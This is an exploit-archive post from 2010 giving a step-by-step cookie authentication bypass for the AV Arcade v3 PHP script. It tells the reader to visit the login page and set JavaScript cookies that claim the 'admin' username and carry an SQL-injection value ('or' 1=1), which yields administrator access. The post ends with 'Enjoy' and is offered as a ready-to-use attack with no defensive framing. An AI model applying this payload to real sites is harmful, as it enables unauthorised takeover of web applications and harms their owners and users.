AV Arcade v3 Cookie Authentication Bypass

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AV Arcade v3 Cookie Authentication Bypass
# Published : 2010-07-28
# Author : saudi0hacker
# Previous Title : Joomla Component Appointinator 1.0.1 Multiple Remote Vulnerabilities
# Next Title : Joomla Component PhotoMap Gallery 1.6.0 Multiple Blind SQL Injection

:----------------------------------------------------------------------------:
: # Software      : AV Arcade v3   [PHP]                                     :
: # Site          : www.avscripts.net                                        :
: # Date          : 28/07/2010                                               :
: # Author        : saudi0hacker                                             :
: # Type          : Auth Bypass / Cookie                                     :
: # Greetz to     : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
:----------------------------------------------------------------------------:

[1] Go to the URL:
    http://www.xxxxx.net/index.php?task=login

[2] Apply these Cookie:

    Javascript:document.cookie = "ava_username=admin;"
    Javascript:document.cookie = "ava_code=c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;"

[3] Go to main Page:

[4] Enjoy